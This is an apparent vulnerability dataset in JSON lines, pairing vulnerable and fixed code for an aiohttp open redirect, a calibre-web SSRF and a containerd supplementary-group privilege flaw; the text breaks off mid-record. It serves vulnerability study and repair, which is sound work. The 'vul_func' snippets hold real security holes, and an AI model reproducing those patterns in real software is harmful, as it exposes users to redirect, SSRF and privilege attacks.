{"cve_id": "CVE-2021-21330", "cve_description": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. In aiohttp before version 3.7.4 there is an open redirect vulnerability. A maliciously crafted link to an aiohttp-based web-server could redirect the browser to a different website. It is caused by a bug in the `aiohttp.web_middlewares.normalize_path_middleware` middleware. This security problem has been fixed in 3.7.4. Upgrade your dependency using pip as follows \"pip install aiohttp >= 3.7.4\". If upgrading is not an option for you, a workaround can be to avoid using `aiohttp.web_middlewares.normalize_path_middleware` in your applications.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/aio-libs/aiohttp", "patch_url": ["https://github.com/aio-libs/aiohttp/commit/2545222a3853e31ace15d87ae0e2effb7da0c96b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_357_1", "commit": "f2afa2f054ba9e6c5d142e00233f0073925e7893", "file_path": "aiohttp/web_middlewares.py", "start_line": 88, "end_line": 117, "snippet": " async def impl(request: Request, handler: _Handler) -> StreamResponse:\n if isinstance(request.match_info.route, SystemRoute):\n paths_to_check = []\n if \"?\" in request.raw_path:\n path, query = request.raw_path.split(\"?\", 1)\n query = \"?\" + query\n else:\n query = \"\"\n path = request.raw_path\n\n if merge_slashes:\n paths_to_check.append(re.sub(\"//+\", \"/\", path))\n if append_slash and not request.path.endswith(\"/\"):\n paths_to_check.append(path + \"/\")\n if remove_slash and request.path.endswith(\"/\"):\n paths_to_check.append(path[:-1])\n if merge_slashes and append_slash:\n paths_to_check.append(re.sub(\"//+\", \"/\", path + \"/\"))\n if merge_slashes and remove_slash and path.endswith(\"/\"):\n merged_slashes = re.sub(\"//+\", \"/\", path)\n paths_to_check.append(merged_slashes[:-1])\n\n for path in paths_to_check:\n resolves, request = await _check_request_resolves(request, path)\n if resolves:\n raise redirect_class(request.raw_path + query)\n\n return await handler(request)\n\n return impl"}], "fix_func": [{"id": "fix_py_357_1", "commit": "2545222a3853e31ace15d87ae0e2effb7da0c96b", "file_path": "aiohttp/web_middlewares.py", "start_line": 88, "end_line": 118, "snippet": " async def impl(request: Request, handler: _Handler) -> StreamResponse:\n if isinstance(request.match_info.route, SystemRoute):\n paths_to_check = []\n if \"?\" in request.raw_path:\n path, query = request.raw_path.split(\"?\", 1)\n query = \"?\" + query\n else:\n query = \"\"\n path = request.raw_path\n\n if merge_slashes:\n paths_to_check.append(re.sub(\"//+\", \"/\", path))\n if append_slash and not request.path.endswith(\"/\"):\n paths_to_check.append(path + \"/\")\n if remove_slash and request.path.endswith(\"/\"):\n paths_to_check.append(path[:-1])\n if merge_slashes and append_slash:\n paths_to_check.append(re.sub(\"//+\", \"/\", path + \"/\"))\n if merge_slashes and remove_slash and path.endswith(\"/\"):\n merged_slashes = re.sub(\"//+\", \"/\", path)\n paths_to_check.append(merged_slashes[:-1])\n\n for path in paths_to_check:\n path = re.sub(\"^//+\", \"/\", path) # SECURITY: GHSA-v6wp-4m6f-gcjg\n resolves, request = await _check_request_resolves(request, path)\n if resolves:\n raise redirect_class(request.raw_path + query)\n\n return 
await handler(request)\n\n return impl"}], "vul_patch": "--- a/aiohttp/web_middlewares.py\n+++ b/aiohttp/web_middlewares.py\n@@ -21,6 +21,7 @@\n paths_to_check.append(merged_slashes[:-1])\n \n for path in paths_to_check:\n+ path = re.sub(\"^//+\", \"/\", path) # SECURITY: GHSA-v6wp-4m6f-gcjg\n resolves, request = await _check_request_resolves(request, path)\n if resolves:\n raise redirect_class(request.raw_path + query)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0767", "cve_description": "Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.17.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/janeczku/calibre-web", "patch_url": ["https://github.com/janeczku/calibre-web/commit/965352c8d96c9eae7a6867ff76b0db137d04b0b8"], "programing_language": "Python", "vul_func": [{"id": "vul_py_375_1", "commit": "8007e450b3178f517b83b0989744c6df38867932", "file_path": "cps/helper.py", "start_line": 732, "end_line": 751, "snippet": "def save_cover_from_url(url, book_path):\n try:\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n img = requests.get(url, timeout=(10, 200)) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n requests.exceptions.HTTPError,\n requests.exceptions.ConnectionError,\n requests.exceptions.Timeout) as ex:\n log.info(u'Cover Download Error %s', ex)\n return False, _(\"Error Downloading Cover\")\n except MissingDelegateError as ex:\n log.info(u'File Format Error %s', ex)\n return False, _(\"Cover Format Error\")"}], "fix_func": [{"id": "fix_py_375_1", "commit": "965352c8d96c9eae7a6867ff76b0db137d04b0b8", "file_path": "cps/helper.py", "start_line": 732, "end_line": 751, "snippet": "def save_cover_from_url(url, book_path):\n try:\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\" or ip == \"0.0.0.0\" or ip == \"::\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n img = requests.get(url, timeout=(10, 200), allow_redirects=False) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n requests.exceptions.HTTPError,\n requests.exceptions.ConnectionError,\n requests.exceptions.Timeout) as ex:\n log.info(u'Cover Download Error %s', ex)\n return False, _(\"Error Downloading Cover\")\n except MissingDelegateError as ex:\n log.info(u'File Format Error %s', ex)\n return False, _(\"Cover Format Error\")"}], "vul_patch": "--- a/cps/helper.py\n+++ b/cps/helper.py\n@@ -3,10 +3,10 @@\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n- if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == 
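The aiohttp record above hinges on one added line, `path = re.sub("^//+", "/", path)`. Browsers and URL parsers treat a path that begins with `//` as a scheme-relative URL, so a candidate like `//evil.com/` replaces the host rather than the path. A minimal, self-contained Python sketch of that mechanic (standard library only, not aiohttp's actual code):

```python
import re
from urllib.parse import urljoin

# A Location header of "//evil.com/" is scheme-relative: it replaces the host.
assert urljoin("https://example.org/x", "//evil.com/") == "https://evil.com/"

def sanitize(path: str) -> str:
    # The added line from the patch: collapse leading slashes in every
    # candidate before it can become a redirect target.
    return re.sub("^//+", "/", path)

# After the fix, the same input stays origin-relative.
assert urljoin("https://example.org/x", sanitize("//evil.com/")) \
    == "https://example.org/evil.com/"
```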
\"::1\":\n+ if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\" or ip == \"0.0.0.0\" or ip == \"::\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n- img = requests.get(url, timeout=(10, 200)) # ToDo: Error Handling\n+ img = requests.get(url, timeout=(10, 200), allow_redirects=False) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-25173", "cve_description": "containerd is an open source container runtime. A bug was found in containerd prior to versions 1.6.18 and 1.5.18 where supplementary groups are not set up properly inside a container. If an attacker has direct access to a container and manipulates their supplementary group access, they may be able to use supplementary group access to bypass primary group restrictions in some cases, potentially gaining access to sensitive information or gaining the ability to execute code in that container. Downstream applications that use the containerd client library may be affected as well.\n\nThis bug has been fixed in containerd v1.6.18 and v.1.5.18. Users should update to these versions and recreate containers to resolve this issue. Users who rely on a downstream application that uses containerd's client library should check that application for a separate advisory and instructions. As a workaround, ensure that the `\"USER $USERNAME\"` Dockerfile instruction is not used. Instead, set the container entrypoint to a value similar to `ENTRYPOINT [\"su\", \"-\", \"user\"]` to allow `su` to properly set up supplementary groups.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/containerd/containerd", "patch_url": ["https://github.com/containerd/containerd/commit/133f6bb6cd827ce35a5fb279c1ead12b9d21460a"], "programing_language": "Go", "vul_func": [{"id": "vul_go_52_2", "commit": "0c314901076a74a7b797a545d2f462285fdbb8c4", "file_path": "oci/spec_opts.go", "start_line": 523, "end_line": 613, "snippet": "func WithUser(userstr string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) error {\n\t\tsetProcess(s)\n\n\t\t// For LCOW it's a bit harder to confirm that the user actually exists on the host as a rootfs isn't\n\t\t// mounted on the host and shared into the guest, but rather the rootfs is constructed entirely in the\n\t\t// guest itself. 
To accommodate this, a spot to place the user string provided by a client as-is is needed.\n\t\t// The `Username` field on the runtime spec is marked by Platform as only for Windows, and in this case it\n\t\t// *is* being set on a Windows host at least, but will be used as a temporary holding spot until the guest\n\t\t// can use the string to perform these same operations to grab the uid:gid inside.\n\t\tif s.Windows != nil && s.Linux != nil {\n\t\t\ts.Process.User.Username = userstr\n\t\t\treturn nil\n\t\t}\n\n\t\tparts := strings.Split(userstr, \":\")\n\t\tswitch len(parts) {\n\t\tcase 1:\n\t\t\tv, err := strconv.Atoi(parts[0])\n\t\t\tif err != nil {\n\t\t\t\t// if we cannot parse as a uint they try to see if it is a username\n\t\t\t\treturn WithUsername(userstr)(ctx, client, c, s)\n\t\t\t}\n\t\t\treturn WithUserID(uint32(v))(ctx, client, c, s)\n\t\tcase 2:\n\t\t\tvar (\n\t\t\t\tusername string\n\t\t\t\tgroupname string\n\t\t\t)\n\t\t\tvar uid, gid uint32\n\t\t\tv, err := strconv.Atoi(parts[0])\n\t\t\tif err != nil {\n\t\t\t\tusername = parts[0]\n\t\t\t} else {\n\t\t\t\tuid = uint32(v)\n\t\t\t}\n\t\t\tif v, err = strconv.Atoi(parts[1]); err != nil {\n\t\t\t\tgroupname = parts[1]\n\t\t\t} else {\n\t\t\t\tgid = uint32(v)\n\t\t\t}\n\t\t\tif username == \"\" && groupname == \"\" {\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, gid\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tf := func(root string) error {\n\t\t\t\tif username != \"\" {\n\t\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\t\treturn u.Name == username\n\t\t\t\t\t})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tuid = uint32(user.Uid)\n\t\t\t\t}\n\t\t\t\tif groupname != \"\" {\n\t\t\t\t\tgid, err = GIDFromPath(root, func(g user.Group) bool {\n\t\t\t\t\t\treturn g.Name == groupname\n\t\t\t\t\t})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, gid\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t\t}\n\t\t\t\treturn f(s.Root.Path)\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" {\n\t\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t\t}\n\t\t\tif c.SnapshotKey == \"\" {\n\t\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t\t}\n\t\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tmounts = tryReadonlyMounts(mounts)\n\t\t\treturn mount.WithTempMount(ctx, mounts, f)\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"invalid USER value %s\", userstr)\n\t\t}\n\t}\n}"}, {"id": "vul_go_52_3", "commit": "0c314901076a74a7b797a545d2f462285fdbb8c4", "file_path": "oci/spec_opts.go", "start_line": 616, "end_line": 623, "snippet": "func WithUIDGID(uid, gid uint32) SpecOpts {\n\treturn func(_ context.Context, _ Client, _ *containers.Container, s *Spec) error {\n\t\tsetProcess(s)\n\t\ts.Process.User.UID = uid\n\t\ts.Process.User.GID = gid\n\t\treturn nil\n\t}\n}"}, {"id": "vul_go_52_4", "commit": "0c314901076a74a7b797a545d2f462285fdbb8c4", "file_path": "oci/spec_opts.go", "start_line": 629, "end_line": 678, "snippet": "func WithUserID(uid uint32) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\tsetProcess(s)\n\t\tif c.Snapshotter == \"\" && 
c.SnapshotKey == \"\" {\n\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t}\n\t\t\tuser, err := UserFromPath(s.Root.Path, func(u user.User) bool {\n\t\t\t\treturn u.Uid == int(uid)\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n\t\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, 0\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\treturn nil\n\n\t\t}\n\t\tif c.Snapshotter == \"\" {\n\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t}\n\t\tif c.SnapshotKey == \"\" {\n\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t}\n\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmounts = tryReadonlyMounts(mounts)\n\t\treturn mount.WithTempMount(ctx, mounts, func(root string) error {\n\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\treturn u.Uid == int(uid)\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n\t\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, 0\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\treturn nil\n\t\t})\n\t}\n}"}, {"id": "vul_go_52_5", "commit": "0c314901076a74a7b797a545d2f462285fdbb8c4", "file_path": "oci/spec_opts.go", "start_line": 686, "end_line": 733, "snippet": "func WithUsername(username string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\tsetProcess(s)\n\t\tif s.Linux != nil {\n\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t\t}\n\t\t\t\tuser, err := UserFromPath(s.Root.Path, func(u user.User) bool {\n\t\t\t\t\treturn u.Name == username\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" {\n\t\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t\t}\n\t\t\tif c.SnapshotKey == \"\" {\n\t\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t\t}\n\t\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tmounts = tryReadonlyMounts(mounts)\n\t\t\treturn mount.WithTempMount(ctx, mounts, func(root string) error {\n\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\treturn u.Name == username\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\t\treturn nil\n\t\t\t})\n\t\t} else if s.Windows != nil {\n\t\t\ts.Process.User.Username = username\n\t\t} else {\n\t\t\treturn errors.New(\"spec does not contain Linux or Windows section\")\n\t\t}\n\t\treturn nil\n\t}\n}"}, {"id": "vul_go_52_6", "commit": "0c314901076a74a7b797a545d2f462285fdbb8c4", "file_path": "oci/spec_opts.go", "start_line": 738, "end_line": 804, "snippet": "func WithAdditionalGIDs(userstr string) SpecOpts {\n\treturn func(ctx context.Context, 
client Client, c *containers.Container, s *Spec) (err error) {\n\t\t// For LCOW or on Darwin additional GID's not supported\n\t\tif s.Windows != nil || runtime.GOOS == \"darwin\" {\n\t\t\treturn nil\n\t\t}\n\t\tsetProcess(s)\n\t\tsetAdditionalGids := func(root string) error {\n\t\t\tvar username string\n\t\t\tuid, err := strconv.Atoi(userstr)\n\t\t\tif err == nil {\n\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\treturn u.Uid == uid\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n\t\t\t\t\t\treturn nil\n\t\t\t\t\t}\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tusername = user.Name\n\t\t\t} else {\n\t\t\t\tusername = userstr\n\t\t\t}\n\t\t\tgids, err := getSupplementalGroupsFromPath(root, func(g user.Group) bool {\n\t\t\t\t// we only want supplemental groups\n\t\t\t\tif g.Name == username {\n\t\t\t\t\treturn false\n\t\t\t\t}\n\t\t\t\tfor _, entry := range g.List {\n\t\t\t\t\tif entry == username {\n\t\t\t\t\t\treturn true\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn false\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif os.IsNotExist(err) {\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ts.Process.User.AdditionalGids = gids\n\t\t\treturn nil\n\t\t}\n\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t}\n\t\t\treturn setAdditionalGids(s.Root.Path)\n\t\t}\n\t\tif c.Snapshotter == \"\" {\n\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t}\n\t\tif c.SnapshotKey == \"\" {\n\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t}\n\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmounts = tryReadonlyMounts(mounts)\n\t\treturn mount.WithTempMount(ctx, mounts, setAdditionalGids)\n\t}\n}"}], "fix_func": [{"id": "fix_go_52_1", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 116, "end_line": 126, "snippet": "// ensureAdditionalGids ensures that the primary GID is also included in the additional GID list.\nfunc ensureAdditionalGids(s *Spec) {\n\tsetProcess(s)\n\tfor _, f := range s.Process.User.AdditionalGids {\n\t\tif f == s.Process.User.GID {\n\t\t\treturn\n\t\t}\n\t}\n\ts.Process.User.AdditionalGids = append([]uint32{s.Process.User.GID}, s.Process.User.AdditionalGids...)\n}\n"}, {"id": "fix_go_52_2", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 534, "end_line": 626, "snippet": "func WithUser(userstr string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) error {\n\t\tdefer ensureAdditionalGids(s)\n\t\tsetProcess(s)\n\t\ts.Process.User.AdditionalGids = nil\n\n\t\t// For LCOW it's a bit harder to confirm that the user actually exists on the host as a rootfs isn't\n\t\t// mounted on the host and shared into the guest, but rather the rootfs is constructed entirely in the\n\t\t// guest itself. 
To accommodate this, a spot to place the user string provided by a client as-is is needed.\n\t\t// The `Username` field on the runtime spec is marked by Platform as only for Windows, and in this case it\n\t\t// *is* being set on a Windows host at least, but will be used as a temporary holding spot until the guest\n\t\t// can use the string to perform these same operations to grab the uid:gid inside.\n\t\tif s.Windows != nil && s.Linux != nil {\n\t\t\ts.Process.User.Username = userstr\n\t\t\treturn nil\n\t\t}\n\n\t\tparts := strings.Split(userstr, \":\")\n\t\tswitch len(parts) {\n\t\tcase 1:\n\t\t\tv, err := strconv.Atoi(parts[0])\n\t\t\tif err != nil {\n\t\t\t\t// if we cannot parse as a uint they try to see if it is a username\n\t\t\t\treturn WithUsername(userstr)(ctx, client, c, s)\n\t\t\t}\n\t\t\treturn WithUserID(uint32(v))(ctx, client, c, s)\n\t\tcase 2:\n\t\t\tvar (\n\t\t\t\tusername string\n\t\t\t\tgroupname string\n\t\t\t)\n\t\t\tvar uid, gid uint32\n\t\t\tv, err := strconv.Atoi(parts[0])\n\t\t\tif err != nil {\n\t\t\t\tusername = parts[0]\n\t\t\t} else {\n\t\t\t\tuid = uint32(v)\n\t\t\t}\n\t\t\tif v, err = strconv.Atoi(parts[1]); err != nil {\n\t\t\t\tgroupname = parts[1]\n\t\t\t} else {\n\t\t\t\tgid = uint32(v)\n\t\t\t}\n\t\t\tif username == \"\" && groupname == \"\" {\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, gid\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tf := func(root string) error {\n\t\t\t\tif username != \"\" {\n\t\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\t\treturn u.Name == username\n\t\t\t\t\t})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tuid = uint32(user.Uid)\n\t\t\t\t}\n\t\t\t\tif groupname != \"\" {\n\t\t\t\t\tgid, err = GIDFromPath(root, func(g user.Group) bool {\n\t\t\t\t\t\treturn g.Name == groupname\n\t\t\t\t\t})\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, gid\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t\t}\n\t\t\t\treturn f(s.Root.Path)\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" {\n\t\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t\t}\n\t\t\tif c.SnapshotKey == \"\" {\n\t\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t\t}\n\t\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tmounts = tryReadonlyMounts(mounts)\n\t\t\treturn mount.WithTempMount(ctx, mounts, f)\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"invalid USER value %s\", userstr)\n\t\t}\n\t}\n}"}, {"id": "fix_go_52_3", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 629, "end_line": 638, "snippet": "func WithUIDGID(uid, gid uint32) SpecOpts {\n\treturn func(_ context.Context, _ Client, _ *containers.Container, s *Spec) error {\n\t\tdefer ensureAdditionalGids(s)\n\t\tsetProcess(s)\n\t\ts.Process.User.AdditionalGids = nil\n\t\ts.Process.User.UID = uid\n\t\ts.Process.User.GID = gid\n\t\treturn nil\n\t}\n}"}, {"id": "fix_go_52_4", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 644, "end_line": 684, "snippet": "func WithUserID(uid uint32) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) 
(err error) {\n\t\tdefer ensureAdditionalGids(s)\n\t\tsetProcess(s)\n\t\ts.Process.User.AdditionalGids = nil\n\t\tsetUser := func(root string) error {\n\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\treturn u.Uid == int(uid)\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n\t\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, 0\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\treturn nil\n\t\t}\n\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t}\n\t\t\treturn setUser(s.Root.Path)\n\t\t}\n\t\tif c.Snapshotter == \"\" {\n\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t}\n\t\tif c.SnapshotKey == \"\" {\n\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t}\n\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmounts = tryReadonlyMounts(mounts)\n\t\treturn mount.WithTempMount(ctx, mounts, setUser)\n\t}\n}"}, {"id": "fix_go_52_5", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 692, "end_line": 735, "snippet": "func WithUsername(username string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\tdefer ensureAdditionalGids(s)\n\t\tsetProcess(s)\n\t\ts.Process.User.AdditionalGids = nil\n\t\tif s.Linux != nil {\n\t\t\tsetUser := func(root string) error {\n\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\treturn u.Name == username\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t\t}\n\t\t\t\treturn setUser(s.Root.Path)\n\t\t\t}\n\t\t\tif c.Snapshotter == \"\" {\n\t\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t\t}\n\t\t\tif c.SnapshotKey == \"\" {\n\t\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t\t}\n\t\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tmounts = tryReadonlyMounts(mounts)\n\t\t\treturn mount.WithTempMount(ctx, mounts, setUser)\n\t\t} else if s.Windows != nil {\n\t\t\ts.Process.User.Username = username\n\t\t} else {\n\t\t\treturn errors.New(\"spec does not contain Linux or Windows section\")\n\t\t}\n\t\treturn nil\n\t}\n}"}, {"id": "fix_go_52_6", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 740, "end_line": 808, "snippet": "func WithAdditionalGIDs(userstr string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\t// For LCOW or on Darwin additional GID's not supported\n\t\tif s.Windows != nil || runtime.GOOS == \"darwin\" {\n\t\t\treturn nil\n\t\t}\n\t\tsetProcess(s)\n\t\ts.Process.User.AdditionalGids = nil\n\t\tsetAdditionalGids := func(root string) error {\n\t\t\tdefer ensureAdditionalGids(s)\n\t\t\tvar 
